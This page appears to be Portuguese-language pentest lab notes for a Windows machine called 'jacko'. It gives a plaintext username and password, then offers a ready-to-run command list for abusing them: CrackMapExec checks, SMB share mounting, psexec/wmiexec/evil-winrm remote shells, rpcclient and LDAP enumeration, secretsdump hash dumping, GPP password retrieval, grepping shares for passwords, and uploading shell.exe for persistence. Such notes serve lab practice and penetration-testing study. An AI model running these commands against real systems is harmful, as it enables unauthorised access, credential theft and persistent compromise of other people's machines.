Skip to content

Credentials

Credenciais obtidas

# Usuário: tony
# Senha: BeyondLakeBarber399
# Domínio (se aplicável): jacko
# IP da máquina alvo: export IP=192.168.226.66

export IP=192.168.226.66
export USER=tony
export PASS='BeyondLakeBarber399'

# Testar credenciais com CrackMapExec
crackmapexec smb $IP -u $USER -p "$PASS"

# Enumerar compartilhamentos SMB
crackmapexec smb $IP -u $USER -p "$PASS" --shares

# Alternativa com smbclient
smbclient -L //$IP/ -U "$USER"

# Tentar acesso manual aos shares
smbclient //$IP/C$ -U "$USER"            # Falha se não for admin
smbclient //$IP/IPC$ -U "$USER"

# Montar compartilhamento com CIFS (Linux)
sudo mkdir -p /mnt/smb
sudo mount -t cifs //$IP/C$ /mnt/smb -o user=$USER,password="$PASS",domain=jacko

# Validar se o usuário possui privilégios administrativos via CrackMapExec
crackmapexec smb $IP -u $USER -p "$PASS" --exec-method psexec -x "whoami"

# Se for admin, obter shell remoto com psexec.py
python3 /usr/share/doc/python3-impacket/examples/psexec.py jacko/$USER:"$PASS"@$IP

# Alternativas:
python3 /usr/share/doc/python3-impacket/examples/wmiexec.py jacko/$USER:"$PASS"@$IP
python3 /usr/share/doc/python3-impacket/examples/smbexec.py jacko/$USER:"$PASS"@$IP

# Enumerar usuários e grupos via RPC
rpcclient -U "$USER" $IP
# Comandos dentro do rpcclient:
# enumdomusers
# enumalsgroups builtin
# enumalsgroups domain
# lsaenumsid
# queryuser SID

# Se RDP estiver habilitado:
xfreerdp /u:$USER /p:"$PASS" /v:$IP

# Testar acesso via WinRM:
evil-winrm -i $IP -u $USER -p "$PASS"

# Se for DC, usar LDAP para coletar dados:
ldapsearch -x -H ldap://$IP -D "jacko\\$USER" -w "$PASS" -b "dc=jacko,dc=local"

# Dump de hashes se for administrador:
secretsdump.py jacko/$USER:"$PASS"@$IP

# Verificar se GPP está disponível (Group Policy Preferences)
crackmapexec smb $IP -u $USER -p "$PASS" --gpp-password

# Buscar arquivos sensíveis após montar compartilhamento:
# .kdbx, .config, .ps1, .txt, .rdp, senhas, scripts

# Buscar possíveis senhas em arquivos acessíveis:
find /mnt/smb -type f \( -iname "*.txt" -o -iname "*.config" -o -iname "*.xml" -o -iname "*.ps1" \) -exec grep -iE 'pass|senha|cred' {} \;

# Upload de payloads (ex: para privesc ou persistence):
smbclient //$IP/C$ -U "$USER"
# smb: \> put shell.exe